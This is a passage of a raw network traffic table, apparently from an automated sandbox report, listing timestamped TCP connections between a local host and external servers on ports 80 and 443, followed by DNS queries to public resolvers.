                                                                                                                        Nov 25, 2021 13:01:16.196101904 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.196217060 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.196336985 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.462950945 CET8049839203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.463659048 CET8049839203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.464023113 CET4983980192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.464124918 CET4983980192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.475204945 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.475269079 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.475429058 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.475545883 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.483566046 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483633041 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483676910 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483719110 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483760118 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483793020 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.483800888 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483918905 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.483922005 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.483966112 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484009027 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484050035 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484088898 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484131098 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484146118 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.484170914 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484214067 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484256029 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484277010 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.484296083 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484338999 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484380960 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.484508038 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.484622955 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.484848022 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.735482931 CET8049839203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.754430056 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.754472971 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.754492044 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.754508018 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.754734039 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.754862070 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.763858080 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763891935 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763912916 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763932943 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763953924 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763973951 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.763993979 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.764122963 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.764255047 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.765439034 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765491962 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765516043 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765536070 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765729904 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.765861034 CET4983880192.168.11.20203.170.80.250
                                                                                                                        Nov 25, 2021 13:01:16.765916109 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765943050 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765964031 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.765985012 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766006947 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766026974 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766051054 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766071081 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766092062 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766113043 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766133070 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766153097 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766172886 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766194105 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766213894 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766233921 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766253948 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766274929 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:16.766294956 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.037615061 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.043567896 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.043632984 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.043674946 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.043716908 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.043759108 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049222946 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049288034 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049330950 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049371958 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049412966 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049453974 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049494028 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049534082 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049575090 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049613953 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049654961 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049695969 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049735069 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049774885 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049814939 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:17.049859047 CET8049838203.170.80.250192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:24.708694935 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:24.708794117 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:24.709064007 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:24.763737917 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:24.763796091 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:24.993223906 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:24.993459940 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:24.993496895 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.005702019 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.005755901 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.006546974 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.006784916 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.008722067 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.051997900 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.210479975 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.210556984 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.210638046 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.210685015 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.210787058 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.210848093 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.320796967 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.321062088 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321089029 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321399927 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.321552038 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321573019 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321597099 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321647882 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.321877003 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.322129965 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.402451992 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.402800083 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.402858973 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.433218002 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.433454037 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.433711052 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.433881998 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.433913946 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.433928013 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.433952093 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.434362888 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.434530020 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.434560061 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.434637070 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.470829964 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.471076012 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.471208096 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.545159101 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.545361996 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.545437098 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.545825958 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.546021938 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.546514034 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.546664953 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.546686888 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.546710014 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.546724081 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.546797037 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.547035933 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.547178984 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.547205925 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.547317982 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.547559023 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.547708035 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.547801971 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.548086882 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.548326015 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.548424006 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.548569918 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.548733950 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.548778057 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.548796892 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.580847025 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.581095934 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.622786999 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.623074055 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.623209000 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.659143925 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.659323931 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.659387112 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.659753084 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.659909964 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.659934998 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.660008907 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.660341024 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.660558939 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.660587072 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.660665035 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.660701036 CET44349840107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:25.660773039 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:25.660945892 CET49840443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.594960928 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.595045090 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:32.595242023 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.634721994 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.634736061 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:32.862760067 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:32.862972021 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.863006115 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.872488976 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.872538090 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:32.873183966 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:32.873464108 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.875504971 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:32.915889025 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.079607010 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.079633951 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.079768896 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.079785109 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.079982996 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.079992056 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.189568996 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.189730883 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.189853907 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.189918995 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.190005064 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.190016985 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.190102100 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.190294027 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.232122898 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.232378006 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.300048113 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.300128937 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.300358057 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.300374985 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.300540924 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.300551891 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.300554991 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.300718069 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.300909042 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.340205908 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.340384007 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.340399027 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.340626955 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.342194080 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.342416048 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.410265923 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.410479069 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.410671949 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.410857916 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.411039114 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.411084890 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.411202908 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.411379099 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.411401987 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.411483049 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.411735058 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.411902905 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.412113905 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.412208080 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.412230015 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.412259102 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.412488937 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.412525892 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.412537098 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.450758934 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.450958967 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.450992107 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.451000929 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.451242924 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.452435970 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.452683926 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.452867031 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.453116894 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.453157902 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.522722960 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.522875071 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.522905111 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.522984028 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.523103952 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523133993 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.523140907 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523149014 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523156881 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523219109 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523231030 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.523416042 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523509026 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523545980 CET44349841107.6.148.162192.168.11.20
                                                                                                                        Nov 25, 2021 13:01:33.523551941 CET49841443192.168.11.20107.6.148.162
                                                                                                                        Nov 25, 2021 13:01:33.523730993 CET49841443192.168.11.20107.6.148.162

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 25, 2021 12:54:53.733247995 CET6477753192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:54:53.942935944 CET53647771.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:55:50.986593008 CET6482153192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:55:51.042181015 CET53648211.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:55:56.046475887 CET6156453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:55:57.061180115 CET6156453192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:55:58.076499939 CET6156453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:55:58.974168062 CET53615641.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:55:58.974231958 CET53615641.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:55:58.974685907 CET6156453192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:55:58.974780083 CET6156453192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:56:07.997185946 CET5624853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:08.015940905 CET53562481.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:13.027062893 CET5325553192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:13.209991932 CET53532551.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:28.414575100 CET4956253192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:28.519181967 CET53495621.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:33.584800005 CET5016753192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:33.892754078 CET53501671.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:39.584042072 CET6246453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:39.787123919 CET53624641.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:45.129364967 CET4939853192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:45.150636911 CET53493981.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:50.159405947 CET6031053192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:50.179316044 CET53603101.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:55.205044031 CET5119453192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:56:55.394290924 CET53511941.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:56:55.394615889 CET5119453192.168.11.209.9.9.9
                                                                                                                        Nov 25, 2021 12:56:55.683530092 CET53511949.9.9.9192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:00.688455105 CET5595653192.168.11.201.1.1.1
                                                                                                                        Nov 25, 2021 12:57:00.714526892 CET53559561.1.1.1192.168.11.20
                                                                                                                        Nov 25, 2021 12:57:05.718594074 CET6102753192.168.11.201.1.1.1
